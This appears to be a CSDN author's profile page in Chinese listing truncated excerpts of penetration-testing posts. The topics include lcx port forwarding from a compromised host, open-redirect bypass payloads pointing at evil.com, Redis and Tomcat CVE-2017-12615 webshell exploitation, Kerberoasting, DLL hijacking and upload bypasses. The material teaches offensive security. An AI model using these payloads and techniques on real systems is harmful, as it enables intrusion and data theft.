多学点技术
码龄6年
关注
提问 私信
  • 博客:288,905
    动态:84
    288,989
    总访问量
  • 151
    原创
  • 1,325,188
    排名
  • 573
    粉丝
  • 6
    铁粉

个人简介:不多学点技术,迟早要露馅儿!!!

IP属地以运营商信息为准,境内显示到省(区、市),境外显示到国家(地区)
IP 属地:广东省
  • 加入CSDN时间: 2018-12-09
博客简介:

ssrf

查看详细资料
个人成就
  • 获得251次点赞
  • 内容获得81次评论
  • 获得1,225次收藏
  • 代码片获得3,147次分享
创作历程
  • 1篇
    2023年
  • 57篇
    2021年
  • 98篇
    2020年
成就勋章
TA的专栏
  • 自研小工具
    付费
    2篇
  • SRC挖掘
    1篇
  • 渗透测试
    25篇
  • 移动APP安全
    16篇
  • 系统漏洞
  • 内网渗透
    8篇
  • 安全工具
    10篇
  • 代码审计
    9篇
  • 文件上传绕过
    15篇
  • 提权
    10篇
  • 漏洞复现
    4篇
  • 网络基础
    26篇
  • CTF
    1篇
  • SQL注入总结
    10篇
  • 实战问题汇总
    2篇
  • Vue快速入门
  • 跨站脚本攻击
    2篇
  • Linux系统安全
  • Windows系统安全
兴趣领域 设置
  • 网络空间安全
    web安全
创作活动更多

如何做好一份技术文档?

无论你是技术大神还是初涉此领域的新手,都欢迎分享你的宝贵经验、独到见解与创新方法,为技术传播之路点亮明灯!

174人参与 去创作
  • 最近
  • 文章
  • 代码仓
  • 资源
  • 问答
  • 帖子
  • 视频
  • 课程
  • 关注/订阅/互动
  • 收藏
搜TA的内容
搜索 取消

挖SRC的一些收获

年终送的oppowatch和扫地机器人,爱了爱了❤️。第一家常驻src 零零碎碎挖了一年。除了赏金外,各种节日src均有礼品。欢迎各位师傅一起学习交流。
原创
发布博客 2023.02.26 ·
635 阅读 ·
1 点赞 ·
0 评论 ·
0 收藏

解决安卓7.0以后https抓不到包的问题

1、把代理证书放到系统证书根目录下安卓7.0以后,安卓不信任用户安装的证书,所以抓https时无法解码请求,对于第三方应用,需要将证书添加为系统证书,使用安卓手机添加证书。需如下:root手机安装openssl1、burp到导出证书2、计算导出证书的hash值openssl x509 -inform DER -subject_hash_old -in C:\Users\s\Desktop\burp.cer3、生成系统预设格式证书文件openssl x509 -inform D
原创
发布博客 2021.08.25 ·
2346 阅读 ·
0 点赞 ·
1 评论 ·
7 收藏

【端口转发】内网端口转发

0x001 lcx使用1. 肉鸡上执行:lcx.exe –slave 公网 ip + 端口 肉鸡 ip + 端口例如:lcx.exe -slave xxx.xxx.xxx.xxx 10000 127.0.0.1 3389意思是把肉鸡的 3389 端口转发到 xxx.xxx.xxx.xxx 公网的 10000 端口2. 公网 ip 机器上执行 Lcx.exe –listen 10000 10001例如:Lcx.exe –listen 10001 10000意思是监听公网 ip 机器上的
原创
发布博客 2021.06.10 ·
556 阅读 ·
0 点赞 ·
0 评论 ·
1 收藏

url重定向绕过方式

URL跳转绕过姿势# "@"http://www.target.com/redirecturl=http://whitelist.com@evil.com# "\"http://www.target.com/redirecturl=http://evil.com\a.whitelist.com# "\\"http://www.target.com/redirecturl=http://evil.com\\a.whitelist.com# "?"http://www.target.com
原创
发布博客 2021.04.25 ·
571 阅读 ·
0 点赞 ·
0 评论 ·
2 收藏

【PHP代码审计】代码审计中常见的函数

目录0x001 配置文件0x002 文件读取函数0x003 文件上传函数0x004 打印函数0x005 文件包含0x006 命令执行0x007 代码执行0x008 SQL注入0x009 变量覆盖0x010 逻辑漏洞0x011 特殊点0x001 配置文件config.php cache.config.php0x002 文件读取函数file_get_contents()、highlight_file()、fopen()、readfile()、fread()、fgetss()、fgets()、par
原创
发布博客 2021.03.23 ·
825 阅读 ·
0 点赞 ·
1 评论 ·
11 收藏

【内网渗透】CobaltStrike 初识

目录0x001 安装0x002 主机上线0x001 安装目录结构服务器安装Java环境服务运行需要安装Java环境ubuntu安装方式如下:# 更新软件包列表:sudo apt-get update# 安装openjdk-8-jdk:sudo apt-get install openjdk-8-jdk# 查看java版本,看看是否安装成功:java -version更多安装方式:https://blog.csdn.net/zbj18314469395/article/deta
原创
发布博客 2021.06.05 ·
681 阅读 ·
0 点赞 ·
2 评论 ·
0 收藏

【渗透测试】常见的数据库漏洞

MySQL数据库默认端口:3306攻击方法: 爆破:弱口令 身份认证漏洞:CVE-2012-2122 拒绝服务攻击 Phpmyadmin万能密码绕过:用户名:‘localhost’@’@” 密码任意 提权参考: https://www.seebug.org/appdir/MySQL http://www.waitalone.cn/mysql-tiquan-summary.html?replytocom=390 https://xz.ali
原创
发布博客 2021.03.18 ·
1155 阅读 ·
2 点赞 ·
0 评论 ·
7 收藏

导出当前进程加载的dll

运行程序输入进程pidimport winregimport psutil # pip install psutilimport logginglogging.basicConfig(format='%(asctime)s - %(pathname)s[line:%(lineno)d] - %(levelname)s: %(message)s', level=logging.DEBUG)"""要分析一个应用程序是否存在劫持系统DLL的漏洞,需要这么几
原创
发布博客 2021.03.18 ·
328 阅读 ·
0 点赞 ·
3 评论 ·
1 收藏

dll劫持payload.dll弹出计算器

发布资源 2021.03.18 ·
dll

【渗透测试】服务端模板注入攻击 (SSTI)

目录一、模板注入与常见Web注入二、模板注入原理三、模板注入检测一、模板注入与常见Web注入就注入类型的漏洞来说,常见 Web 注入有:SQL 注入,XSS 注入,XPATH 注入,XML 注入,代码注入,命令注入等等。注入漏洞的实质是服务端接受了用户的输入,未过滤或过滤不严谨执行了拼接了用户输入的代码,因此造成了各类注入。下面这段代码足以说明这一点:// SQL 注入$query = "select * from sometable where id=".$_GET['id'];mysql_
原创
发布博客 2021.03.17 ·
1391 阅读 ·
0 点赞 ·
0 评论 ·
4 收藏

【PHP代码审计】PHPstorm Xdebug配置

目录phpstudy配置phpstorm配置phpstudy配置php.ini配置[XDebug]xdebug.profiler_output_dir="E:\phpStudy\PHPTutorial\tmp\xdebug"xdebug.trace_output_dir="E:\phpStudy\PHPTutorial\tmp\xdebug"zend_extension="E:\phpStudy\PHPTutorial\php\php-5.6.27-nts\ext\php_xdebug.dl
原创
发布博客 2021.03.16 ·
218 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

【内网渗透】搭建隧道

目录0x001 隧道介绍0x002 网络传输应用层检测连通性0x003 网络层ICMP隧道ptunnel使用0x001 隧道介绍什么是隧道?在实际的网络中,通常会通过各种边界设备、软/硬件防火墙甚至入侵检测系统来检查对外连接情况,如果发现异样,就会对通信进行阻断。那么什么是隧道呢?这里的隧道,就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或端口进行封装,然后穿过防火墙,与对方进行通信。当封装的数据包到达目的地时,将数据包还原,并将还原后的数据包发送到相应服务器上。
原创
发布博客 2021.06.05 ·
2873 阅读 ·
3 点赞 ·
1 评论 ·
8 收藏

【内网渗透】内网穿透Ngrok&Frp

目录0x001 代理转发介绍0x002 Ngrok使用0x001 代理转发介绍我们在内网渗透中常会遇到两个所属不同内网的主机要进行通信,如:我们本地内网的kali攻击机要控制另一个内网的服务器/客户机代理方式:正向代理 – > 攻击机连接肉鸡反向代理 – > 肉鸡主动连接攻击机上图所示无论是哪台机器通信都要经过外网的代理服务器0x002 Ngrok使用注册注册地址:https://www.ngrok.cc/开通隧道下载客户端https://ww
原创
发布博客 2021.03.15 ·
1760 阅读 ·
1 点赞 ·
0 评论 ·
4 收藏

Redis 4.x/5.x 未授权访问漏洞

漏洞介绍:Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。影响版本:影响版本Redis未授权访问在4.x/5.0.5版本以下攻击手段:利用现有exp执行系统命令利用计划任务执行命令反弹shell(需root权限)1)下载
原创
发布博客 2021.03.14 ·
239 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

Nginx 解析漏洞

适合版本:版本信息:Nginx 1.x 最新版PHP 7.x最新版该漏洞与Nginx、php版本无关,属于用户配置不当造成的解析漏洞。漏洞复现:在图片路径后增加/.php后缀,被解析成PHP文件:配合文件上传可getshell...
原创
发布博客 2021.03.14 ·
342 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

Tomcat7 +弱口令&&后端Getshell漏洞

Tomcat版本:8.0漏洞介绍:介绍Tomcat支持通过后端部署war文件,因此我们可以直接将webshel​​l放置到web目录中。为了访问后端,需要权限。Tomcat7+权限分为:manager(后台管理)manager-gui 拥有html页面权限manager-status 拥有查看status的权限manager-script 拥有text接口的权限,和status权限manager-jmx 拥有jmx权限,和status权限host-manager(虚拟主机管理)a
原创
发布博客 2021.03.14 ·
1199 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

Tomcat PUT方法任意写文件漏洞

适用版本:Tomcat version: 8.5.19漏洞编号:CVE-2017-12615复现步骤:直接发送以下数据包,然后一句话将被写入Web根目录。PUT /1.jsp/ HTTP/1.1Host: 192.168.134.129:8080Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connect
原创
发布博客 2021.03.14 ·
247 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

【文件上传绕过】二次渲染

目录0x001 什么是二次渲染0x002 绕过0x001 什么是二次渲染在我们上传文件后,网站会对图片进行二次处理(格式、尺寸要求等),处理后在放到网站对应的标签进行显示。如何判断图片是否进行了二次处理?对比要上传图片与上传后的图片大小0x002 绕过这里需要配合文件包含漏洞将一句话木马插入到网站二次处理后的图片中...
原创
发布博客 2021.06.05 ·
1124 阅读 ·
0 点赞 ·
0 评论 ·
2 收藏

【文件上传绕过】uploads17关-条件竞争

目录0x001 源码审计0x002 绕过0x001 源码审计$is_upload = false;$msg = null;if(isset($_POST['submit'])){ $ext_arr = array('jpg','png','gif'); $file_name = $_FILES['upload_file']['name']; $temp_file = $_FILES['upload_file']['tmp_name']; $file_ext =
原创
发布博客 2021.03.14 ·
676 阅读 ·
3 点赞 ·
0 评论 ·
1 收藏

【内网渗透】域横向RDP传递&Kerberoast攻击

目录0x001 RDP协议传递0x002 Kerberoast攻击1)探针服务2)请求获取票据3)导出票据4)破解票据5)重写票据6)利用0x001 RDP协议传递除了之前的IPC,WMI,SMB等协议的链接外,获取到的明文密码或HASH密文也可以通过RDP协议进行链接操作。RDP协议连接:判断对方远程桌面服务是否开启(默认:3389),端口扫描判断RDP明文密码链接windows: mstsc mstsc.exe /console /v:192.168.3.21 /adminlinux:
原创
发布博客 2021.03.09 ·
609 阅读 ·
0 点赞 ·
0 评论 ·
1 收藏
加载更多